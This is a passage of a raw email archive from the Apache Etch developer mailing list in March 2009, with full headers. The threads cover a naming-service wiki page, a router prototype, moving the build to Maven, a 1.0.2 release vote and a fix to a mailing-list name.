72914 invoked by uid 99); 2 Mar 2009 19:45:36 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 02 Mar 2009 11:45:36 -0800 X-ASF-Spam-Status: No, hits=-1.8 required=10.0 tests=HTML_MESSAGE,RCVD_IN_DNSWL_MED,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO sj-iport-6.cisco.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 02 Mar 2009 19:45:26 +0000 X-IronPort-AV: E=Sophos;i="4.38,291,1233532800"; d="scan'208,217";a="259692186" Received: from sj-dkim-3.cisco.com ([161.129.204.104]) by sj-iport-6.cisco.com with ESMTP; 02 Mar 2009 19:45:06 +0000 Received: from sj-core-2.cisco.com (sj-core-2.cisco.com [161.129.204.104]) by sj-dkim-3.cisco.com (8.12.11/8.12.11) with ESMTP id n22Jj6bM013768 for <[email protected]>; Mon, 2 Mar 2009 11:45:06 -0800 Received: from xbh-sjc-211.amer.cisco.com (xbh-sjc-211.cisco.com [161.129.204.104]) by sj-core-2.cisco.com (8.13.8/8.13.8) with ESMTP id n22Jj6CA017675 for <[email protected]>; Mon, 2 Mar 2009 19:45:06 GMT Received: from xmb-sjc-23e.amer.cisco.com ([161.129.204.104]) by xbh-sjc-211.amer.cisco.com with Microsoft SMTPSVC(262)914-4166); Mon, 2 Mar 2009 11:45:06 -0800 X-MimeOLE: Produced By Microsoft Exchange V6.5 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C99B6F.62CB67C6" Subject: Current Naming Service functionality Date: Mon, 2 Mar 2009 11:45:05 -0800 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Current Naming Service functionality thread-index: Acmbb1mCGsF3CdFGSq61zgGcWDaiDQ== From: "Manoj Ganesan (manogane)" <[email protected]> To: <[email protected]> X-OriginalArrivalTime: 02 Mar 2009 19:45:06.0087 (UTC) FILETIME=[62F81370:01C99B6F] DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; l=5345; t=1236023106; x=1236887106; c=relaxed/simple; s=sjdkim3002; h=Content-Type:From:Subject:Content-Transfer-Encoding:MIME-Version; d=cisco.com; [email protected]; z=From:=20=22Manoj=20Ganesan=20(manogane)=22=20<manogane@cis co.com> |Subject:=20Current=20Naming=20Service=20functionality |Sender:=20; bh=YyjhSeVeAPw4ZGqy+ZgfMUn+dy/U11zoR7xQCh9EpWE=; b=ZwThDL8KcklWO78rkiAqog/2vPn3i5yz09XBDH9a50bJ0lnO69Gxz8SBAZ Jyncx1AYC+H60IsGVb3bOJcRrW1PpdjCGSq3eOQ+OhoFtZfb0ZQx9T72abmB pZtOvoYBgC; Authentication-Results: sj-dkim-3; [email protected]; dkim=pass ( sig from cisco.com/sjdkim3002 verified; ); X-Virus-Checked: Checked by ClamAV on apache.org ------_=_NextPart_001_01C99B6F.62CB67C6 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable I have updated the wiki with the functionality the current naming service provides. It is at http://cwiki.apache.org/confluence/display/ETCH/Current+Name+Service+Fun ctionality.=20 =20 Comments? Suggestions? Additions?=20 =20 Manoj. ------_=_NextPart_001_01C99B6F.62CB67C6-- From [email protected] Mon Mar 02 21:21:35 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 85363 invoked from network); 2 Mar 2009 21:21:35 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Mar 2009 21:21:35 -0000 Received: (qmail 95319 invoked by uid 500); 2 Mar 2009 21:21:35 -0000 Delivered-To: [email protected] Received: (qmail 95308 invoked by uid 500); 2 Mar 2009 21:21:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <etch-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 95297 invoked by uid 99); 2 Mar 2009 21:21:35 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 02 Mar 2009 13:21:35 -0800 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO yw-out-1718.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 02 Mar 2009 21:21:27 +0000 Received: by yw-out-1718.google.com with SMTP id 4so1977000ywq.0 for <[email protected]>; Mon, 02 Mar 2009 13:21:06 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type; bh=zZfpGHPMw9KbRh3AUnE5KN+a5F0wcVAq+cLwLs7N8jI=; b=m9ccHLmFzBvCEeGQjwwMFeVaa0M0+Uqur0yuTJv6L8sj3wQLRlVkVA+Pe1wEyfWsBw Jz9WZdfdee0DtnybFQZeo8WlYvawjaeVBQ8EKpLxIaGKqTUbUIOkUzzuPD9836cCmf0h 2o4jVDl++yykcC34yZfCstzUgWeU6YCIh4lw0= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=UlECPAgrxkSgNYWsQ9Tu8p/+aowzADe1Aen63YVaAKnIm0+C206N8vPLgMldBhbMql 7VN+QuxGFRWcDipr0gflKsHFmgBhSp6j3e/vJeEqMsBpEM+VPDgcRb6IXsoBstKrN8Qs yaHjbZvcOHsU3XbBfadLFZ81XT6PgPrtO/qxU= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id t16mr2900030aga.99.1236028863382; Mon, 02 Mar 2009 13:21:03 -0800 (PST) Date: Mon, 2 Mar 2009 15:21:03 -0600 Message-ID: <[email protected]> Subject: Etch-Router prototype implementation and notes From: Wei Wang <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=00163630f33d5584b40464296531 X-Virus-Checked: Checked by ClamAV on apache.org --00163630f33d5584b40464296531 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hello Folks, A prototype implementation of the proposed Etch-Router service has been checked in at: http://svn.apache.org/repos/asf/incubator/etch/branches/router/services/router/ Below is the wiki page for some implementation details of the etch-router: http://cwiki.apache.org/confluence/display/ETCH/Etch+Router+Service Please review it and give your comments. Thanks! --Wei Wang --00163630f33d5584b40464296531-- From [email protected] Tue Mar 03 04:54:33 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 66486 invoked from network); 3 Mar 2009 04:54:33 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 3 Mar 2009 04:54:33 -0000 Received: (qmail 73199 invoked by uid 500); 3 Mar 2009 04:54:33 -0000 Delivered-To: [email protected] Received: (qmail 73186 invoked by uid 500); 3 Mar 2009 04:54:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <etch-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 73175 invoked by uid 99); 3 Mar 2009 04:54:32 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 02 Mar 2009 20:54:32 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wf-out-1314.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 03 Mar 2009 04:54:24 +0000 Received: by wf-out-1314.google.com with SMTP id 25so2908479wfc.21 for <[email protected]>; Mon, 02 Mar 2009 20:54:02 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:sender:received:in-reply-to :references:date:x-google-sender-auth:message-id:subject:from:to :content-type:content-transfer-encoding; bh=hsVHyQRxtWM5eDMwvL5ixPGF7v/6wYqPjhigvngrHuM=; b=nPdEP4/j6IQjlFXEcN9F5IuWFWZE7STwpDDZpMtjm7ZqLg7CTRIPC+XJ24RI63/Hv9 RvdvUk8k1wxmE8cq2fTh14aS4QgMb6kkajcfgOQ89tv2mvpaw7tP2H0IdGo4z0qEy7p4 C3+OxkG8iQjhFBq1ElaWL/pAERGGqKukj3K7I= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:sender:in-reply-to:references:date :x-google-sender-auth:message-id:subject:from:to:content-type :content-transfer-encoding; b=o6nwxph2KbZy6gkh55qYYPivC/o7A5CNjklvZxzidMN9niHWEbQcF5Jjx3lnRl3Ofp kMyo1AmkOJmcbNfmN7UKBJPnblx0ueaSKwQty/Kjsnq/06HdVqPdyVqpOfekp5rh2DBg AUiFtL7IqlnvxO6dXAZvl+B8V/SNpPcVej9nM= MIME-Version: 1.0 Sender: [email protected] Received: by 161.129.204.104 with SMTP id f6mr3394110wfe.257.1236056042945; Mon, 02 Mar 2009 20:54:02 -0800 (PST) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Date: Tue, 3 Mar 2009 12:54:02 +0800 X-Google-Sender-Auth: 3b576d9af7c449d1 Message-ID: <[email protected]> Subject: Re: Mavenizing the Etch build tree From: Niclas Hedhman <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org On Fri, Feb 27, 2009 at 4:20 AM, scott comer <[email protected]> wrote: > make a branch of 1.1, call it maven, and knock yourself out. it can't go > into 1.1 stream, we could merge it into something post 1.1. > > i'd rather have logging... Well, I would recommend to do it on trunk, but that the effort is not allowed to move anything around. That way, only a pom.xml will show up and can be ignored by everyone else who are not interested. Cheers Niclas -- http://www.qi4j.org - New Energy for Java From [email protected] Tue Mar 03 13:37:20 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54641 invoked from network); 3 Mar 2009 13:37:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 3 Mar 2009 13:37:20 -0000 Received: (qmail 54199 invoked by uid 500); 3 Mar 2009 13:37:19 -0000 Delivered-To: [email protected] Received: (qmail 54185 invoked by uid 500); 3 Mar 2009 13:37:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <etch-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 54174 invoked by uid 99); 3 Mar 2009 13:37:19 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 03 Mar 2009 05:37:19 -0800 X-ASF-Spam-Status: No, hits=-1.8 required=10.0 tests=HTML_MESSAGE,RCVD_IN_DNSWL_MED,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO sj-iport-6.cisco.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 03 Mar 2009 13:37:08 +0000 X-IronPort-AV: E=Sophos;i="4.38,296,1233532800"; d="vcf'?scan'208,217";a="260181109" Received: from sj-dkim-4.cisco.com ([161.129.204.104]) by sj-iport-6.cisco.com with ESMTP; 03 Mar 2009 13:36:47 +0000 Received: from sj-core-5.cisco.com (sj-core-5.cisco.com [161.129.204.104]) by sj-dkim-4.cisco.com (8.12.11/8.12.11) with ESMTP id n23Dal27003786 for <[email protected]>; Tue, 3 Mar 2009 05:36:47 -0800 Received: from xbh-rtp-201.amer.cisco.com (xbh-rtp-201.cisco.com [161.129.204.104]) by sj-core-5.cisco.com (8.13.8/8.13.8) with ESMTP id n23DakV4002339 for <[email protected]>; Tue, 3 Mar 2009 13:36:47 GMT Received: from xfe-rtp-202.amer.cisco.com ([161.129.204.104]) by xbh-rtp-201.amer.cisco.com with Microsoft SMTPSVC(262)914-4166); Tue, 3 Mar 2009 08:36:46 -0500 Received: from [161.129.204.104] ([161.129.204.104]) by xfe-rtp-202.amer.cisco.com with Microsoft SMTPSVC(262)914-4166); Tue, 3 Mar 2009 08:36:46 -0500 Message-ID: <[email protected]> Date: Tue, 03 Mar 2009 07:36:51 -0600 From: "scott comer (sccomer)" <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20081209) MIME-Version: 1.0 To: [email protected] Subject: Re: Mavenizing the Etch build tree References: <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: multipart/mixed; boundary="------------070806020708000007060602" X-OriginalArrivalTime: 03 Mar 2009 13:36:46.0504 (UTC) FILETIME=[19011280:01C99C05] DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; l=3125; t=1236087407; x=1236951407; c=relaxed/simple; s=sjdkim4002; h=Content-Type:From:Subject:Content-Transfer-Encoding:MIME-Version; d=cisco.com; [email protected]; z=From:=20=22scott=20comer=20(sccomer)=22=20<[email protected] om> |Subject:=20Re=3A=20Mavenizing=20the=20Etch=20build=20tree |Sender:=20; bh=YcAai6lG08fIcZEPgrRFUaBp3VJAlnWeCVW6vguJGaw=; b=sXlYan3H3HUHl+xcaPec3Kw8IVmNFHLJ1QWeiyrZC1KQ/6FUfcUSB29Wku REcLNYU2UUcneWMfDlN6V/F3f1v8NG08WM3pN6+SN00ZeJle9Gjibof+ygZv XIHzBGGeuW; Authentication-Results: sj-dkim-4; [email protected]; dkim=pass ( sig from cisco.com/sjdkim4002 verified; ); X-Virus-Checked: Checked by ClamAV on apache.org --------------070806020708000007060602 Content-Type: multipart/alternative; boundary="------------090109070706030306010507" --------------090109070706030306010507 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit agreed. i think the tree is well designed for mavenization. the only problem, perhaps not insurmountable, is that maven easily supports only java. perhaps it is reasonable that on the the java build be supported. the csharp build still requires ant... scott out Niclas Hedhman wrote: > On Fri, Feb 27, 2009 at 4:20 AM, scott comer <[email protected]> wrote: > >> make a branch of 1.1, call it maven, and knock yourself out. it can't go >> into 1.1 stream, we could merge it into something post 1.1. >> >> i'd rather have logging... >> > > Well, I would recommend to do it on trunk, but that the effort is not > allowed to move anything around. That way, only a pom.xml will show up > and can be ignored by everyone else who are not interested. > > > Cheers > Niclas > --------------090109070706030306010507 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta content="text/html;charset=ISO-8859-1" http-equiv="Content-Type"> </head> <body bgcolor="#ffffff" text="#000000"> agreed. i think the tree is well designed for mavenization.<br> <br> the only problem, perhaps not insurmountable, is that maven easily supports only java. perhaps it is reasonable that on the the java build be supported. the csharp build still requires ant...<br> <br> scott out<br> <br> Niclas Hedhman wrote: <blockquote cite="mid:[email protected]" type="cite"> <pre wrap="">On Fri, Feb 27, 2009 at 4:20 AM, scott comer <a class="moz-txt-link-rfc2396E" href="mailto:[email protected]">&lt;[email protected]&gt;</a> wrote: </pre> <blockquote type="cite"> <pre wrap="">make a branch of 1.1, call it maven, and knock yourself out. it can't go into 1.1 stream, we could merge it into something post 1.1. i'd rather have logging... </pre> </blockquote> <pre wrap=""><!----> Well, I would recommend to do it on trunk, but that the effort is not allowed to move anything around. That way, only a pom.xml will show up and can be ignored by everyone else who are not interested. Cheers Niclas </pre> </blockquote> </body> </html> --------------090109070706030306010507-- --------------070806020708000007060602-- From [email protected] Wed Mar 04 01:41:07 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 5170 invoked from network); 4 Mar 2009 01:41:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Mar 2009 01:41:07 -0000 Received: (qmail 37825 invoked by uid 500); 4 Mar 2009 01:41:07 -0000 Delivered-To: [email protected] Received: (qmail 37809 invoked by uid 500); 4 Mar 2009 01:41:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <etch-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 37798 invoked by uid 99); 4 Mar 2009 01:41:07 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 03 Mar 2009 17:41:07 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO an-out-0708.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 04 Mar 2009 01:40:57 +0000 Received: by an-out-0708.google.com with SMTP id b6so1803697ana.0 for <[email protected]>; Tue, 03 Mar 2009 17:40:36 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:from:to :in-reply-to:content-type:content-transfer-encoding:mime-version :subject:date:references:x-mailer; bh=sdQj6B1kQfQeu6nyIlgd2eWPoGIlP2moocf5juxAmAI=; b=ppbCxayd4sF9ut3E3t0CjOAsa/l9AisXV3SJwX1lYhIJhzGV95KLDdhP8Kc7vO2Lib W1ZkCRIxYT1RyoBP46SfeQNBdgZh7M8En0X5HwlDnATBJ3NkZN66dQ5JrfIHXixIA4ge R2LoOfzP8j6/kmGKerZ3YbTnFZih3U+SWGyjc= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:from:to:in-reply-to:content-type :content-transfer-encoding:mime-version:subject:date:references :x-mailer; b=WvvwequoADhmozRCLhm4M4IAF8stxNmXRSdfPUlQhlLqsPbWfykTLhYYIUCwQh+70u V4js6U/zMRA4D1F+j9tNA61whzn63dzlRDE+1Pogw4tszCzc6l9f5/BFzMiLBUBaZFrY zoEn0YqR9kPKL9AhVv6g4ZwXGf36e6V/IyC0U= Received: by 161.129.204.104 with SMTP id o10mr5073766ang.137.1236130836075; Tue, 03 Mar 2009 17:40:36 -0800 (PST) Received: from ?161.129.204.104? (cpe-24-28-79-164.austin.res.rr.com [161.129.204.104]) by mx.google.com with ESMTPS id b37sm14136897ana.17.2161.129.204.104.40.34 (version=TLSv1/SSLv3 cipher=RC4-MD5); Tue, 03 Mar 2009 17:40:35 -0800 (PST) Message-Id: <[email protected]> From: James Dixson <[email protected]> To: [email protected] In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed; delsp=yes Content-Transfer-Encoding: quoted-printable Mime-Version: 1.0 (Apple Message framework v930.3) Subject: Re: [vote] Release 1.0.2 (second attempt) Date: Tue, 3 Mar 2009 19:40:33 -0600 References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> X-Mailer: Apple Mail (2.930.3) X-Virus-Checked: Checked by ClamAV on apache.org Yeah! +1 for me too. I will submit to general-incubtor. -- james On Mar 2, 2009, at 11:58 AM, scott comer (sccomer) wrote: > ok, the last installed i downloaded, which says release-24, works =20 > and the readme.txt is correct. > > +1 > > scott out > > James Dixson wrote: >> ok i will look at it again >> >> On Mon, Feb 23, 2009 at 4:44 PM, scott comer (sccomer) >> <[email protected]> wrote: >> >>> eh, i installed and nothing was changed. the dates on the binaries =20= >>> are >>> changed, but the readme was the same. the readme in the source =20 >>> distro was >>> changed. >>> >>> scott out >>> >>> James Dixson wrote: >>> >>>> Ok, I have updated the binaries with the README change Scott =20 >>>> suggested. >>>> >>>> Scott: any comments? >>>> >>>> -- >>>> james >>>> >>>> >>>> On Mon, Feb 23, 2009 at 3:50 PM, James Dixson =20 >>>> <[email protected]> wrote: >>>> >>>> >>>>> I made the modifications and I am respinning. I will have updated >>>>> downloads >>>>> shortly (and it will not take a week this time ;-) ). >>>>> -- >>>>> James >>>>> >>>>> >>>>> >>>>> On 2/23/09 2:01 PM, "Scott Comer (sccomer)" <[email protected]> =20= >>>>> wrote: >>>>> >>>>> >>>>> >>>>>> i'm still having problems with the readme. >>>>>> >>>>>> install path is claimed to be >>>>>> >>>>>> C:\Program Files\Apache Software Foundation\apache-etch-1.0.2-=20 >>>>>> incubating >>>>>> >>>>>> actual: >>>>>> >>>>>> C:\Program Files\Apache Software Foundation\apache-etch-1.0.2 >>>>>> >>>>>> the sorting and indent in there is a bit wonky (tabs vs. spaces). >>>>>> >>>>>> other than that, +1. >>>>>> >>>>>> scott out >>>>>> >>>>>> Rene Barraza (rebarraz) wrote: >>>>>> >>>>>> >>>>>>> +1 >>>>>>> >>>>>>> -Ren=E9 >>>>>>> >>>>>>> -----Original Message----- >>>>>>> From: Gaurav Sandhir (gsandhir) >>>>>>> Sent: Monday, February 23, 2009 1:03 PM >>>>>>> To: [email protected] >>>>>>> Subject: RE: [vote] Release 1.0.2 (second attempt) >>>>>>> >>>>>>> +1 >>>>>>> >>>>>>> -Gaurav >>>>>>> >>>>>>> -----Original Message----- >>>>>>> From: James Dixson [mailto:[email protected]] >>>>>>> Sent: Friday, February 20, 2009 11:27 AM >>>>>>> To: [email protected] >>>>>>> Subject: [vote] Release 1.0.2 (second attempt) >>>>>>> >>>>>>> Lets try this again.. >>>>>>> >>>>>>> I have taken all of the suggestions I have received and spun a =20= >>>>>>> new set >>>>>>> of release candidates. >>>>>>> >>>>>>> The candidate files can be found here: >>>>>>> http://people.apache.org/~dixson/apache-etch/1.0.2-incubating/ >>>>>>> >>>>>>> Each file should have a MD5, SHA1 and a Signature. The output =20= >>>>>>> from RAT >>>>>>> is also included "*-rat-output.txt". >>>>>>> >>>>>>> Please take the time to review the archives and then cast your =20= >>>>>>> vote. I >>>>>>> will hold the vote open until Tues (24-Feb). >>>>>>> >>>>>>> Internal Virus Database is out of date. >>>>>>> Checked by AVG - www.avg.com >>>>>>> Version: 8.0.233 / Virus Database: 270.10.18/1935 - Release =20 >>>>>>> Date: >>>>>>> 02/04/09 >>>>>>> 16:35:00 >>>>>>> >>>>>>> >>>>>>> >>>>> -- >>>>> James Dixson >>>>> Manager, Software Development >>>>> CUAE Engineering, Cisco Systems >>>>> (e) [email protected] >>>>> (p) (262)914-4166 >>>>> (m) (262)914-4166 >>>>> >>>>> >>>>> >>>>> >>>>> From [email protected] Wed Mar 04 02:03:36 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 18020 invoked from network); 4 Mar 2009 02:03:36 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Mar 2009 02:03:36 -0000 Received: (qmail 64130 invoked by uid 500); 4 Mar 2009 02:03:36 -0000 Delivered-To: [email protected] Received: (qmail 64122 invoked by uid 500); 4 Mar 2009 02:03:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <etch-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 64111 invoked by uid 99); 4 Mar 2009 02:03:36 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 03 Mar 2009 18:03:36 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO yx-out-1718.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 04 Mar 2009 02:03:28 +0000 Received: by yx-out-1718.google.com with SMTP id 4so2433596yxp.0 for <[email protected]>; Tue, 03 Mar 2009 18:03:07 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:from:to :in-reply-to:content-type:content-transfer-encoding:mime-version :subject:date:references:x-mailer; bh=TI4OHnsQCFB/eMkI3LjBDwWZh9Cshuej1scg48YdIjE=; b=xaQNw3vv9vU9Olp1fcjhqQJh2mXaBZIBdwU8wQ4IX6HLSvcNvkYLpKMNiH/F3E1Ny2 D5N3iYJ/h9seECOaBbM4JG6EMT3YiTHVaQxyy6MQAEWX0PzUtVFQsYOYPIh+kf2UCbXe iTYKcUMCU/SRae5Dxqs08nkIVZH7tyN3U6/u4= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:from:to:in-reply-to:content-type :content-transfer-encoding:mime-version:subject:date:references :x-mailer; b=cH24Nd8xDvq8hSX/Yf1DSJOPt2KmPQaGB4HqrpDfx//8mpWOCksSkO09vk9Rc/wDO9 s+3WgSd+lgEQr5ecno/pkImOmoGrEiEMuSnqYtqAXXOhg5etctFd8sDoQA5eAsnjrf3s oLdnD+uDxTc7mMznL6zOoIKiCp7gwyqi02jNY= Received: by 161.129.204.104 with SMTP id 17mr3859378anh.37.1236132187437; Tue, 03 Mar 2009 18:03:07 -0800 (PST) Received: from ?161.129.204.104? (cpe-24-28-79-164.austin.res.rr.com [161.129.204.104]) by mx.google.com with ESMTPS id d21sm7554261and.6.2161.129.204.104.03.06 (version=TLSv1/SSLv3 cipher=RC4-MD5); Tue, 03 Mar 2009 18:03:07 -0800 (PST) Message-Id: <[email protected]> From: James Dixson <[email protected]> To: [email protected] In-Reply-To: <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed; delsp=yes Content-Transfer-Encoding: 7bit Mime-Version: 1.0 (Apple Message framework v930.3) Subject: Re: etch-user mailing list is spelled wrong Date: Tue, 3 Mar 2009 20:03:04 -0600 References: <[email protected]> X-Mailer: Apple Mail (2.930.3) X-Virus-Checked: Checked by ClamAV on apache.org I do, and I did. -- james On Mar 3, 2009, at 3:01 PM, scott comer (sccomer) wrote: > in the podling status page, it is spelled as etch-users. > > anyone (rene, james) have a tree of incubator checked out and can > fix this? > > else i'll do it ... > > scott out > From [email protected] Wed Mar 04 04:51:07 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 80008 invoked from network); 4 Mar 2009 04:51:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Mar 2009 04:51:07 -0000 Received: (qmail 11365 invoked by uid 500); 4 Mar 2009 04:51:07 -0000 Delivered-To: [email protected] Received: (qmail 11354 invoked by uid 500); 4 Mar 2009 04:51:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <etch-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 11343 invoked by uid 99); 4 Mar 2009 04:51:07 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 03 Mar 2009 20:51:07 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO asmtpout022.mac.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 04 Mar 2009 04:50:57 +0000 MIME-version: 1.0 Content-transfer-encoding: 7BIT Content-type: text/plain; charset=US-ASCII; delsp=yes; format=flowed Received: from [161.129.204.104] ([161.129.204.104]) by asmtp022.mac.com (Sun Java(tm) System Messaging Server 6.3-7.03 (built Aug 7 2008; 32bit)) with ESMTPSA id <[email protected]> for [email protected]; Tue, 03 Mar 2009 20:50:33 -0800 (PST) In-reply-to: <[email protected]> References: <[email protected]> <[email protected]> Message-id: <[email protected]> From: Scott Comer <[email protected]> Subject: Re: etch-user mailing list is spelled wrong Date: Tue, 03 Mar 2009 22:50:54 -0600 To: [email protected] X-Mailer: Apple Mail (2.753.1) X-Virus-Checked: Checked by ClamAV on apache.org sweet. thanks! scott out On Mar 3, 2009, at 8:03 PM, James Dixson wrote: > I do, and I did. > > -- > james > > > On Mar 3, 2009, at 3:01 PM, scott comer (sccomer) wrote: > >> in the podling status page, it is spelled as etch-users. >> >> anyone (rene, james) have a tree of incubator checked out and can >> fix this? >> >> else i'll do it ... >> >> scott out >> > From [email protected] Thu Mar 05 08:04:58 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 87910 invoked from network); 5 Mar 2009 08:04:58 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Mar 2009 08:04:58 -0000 Received: (qmail 31061 invoked by uid 500); 5 Mar 2009 08:04:58 -0000 Delivered-To: [email protected] Received: (qmail 31043 invoked by uid 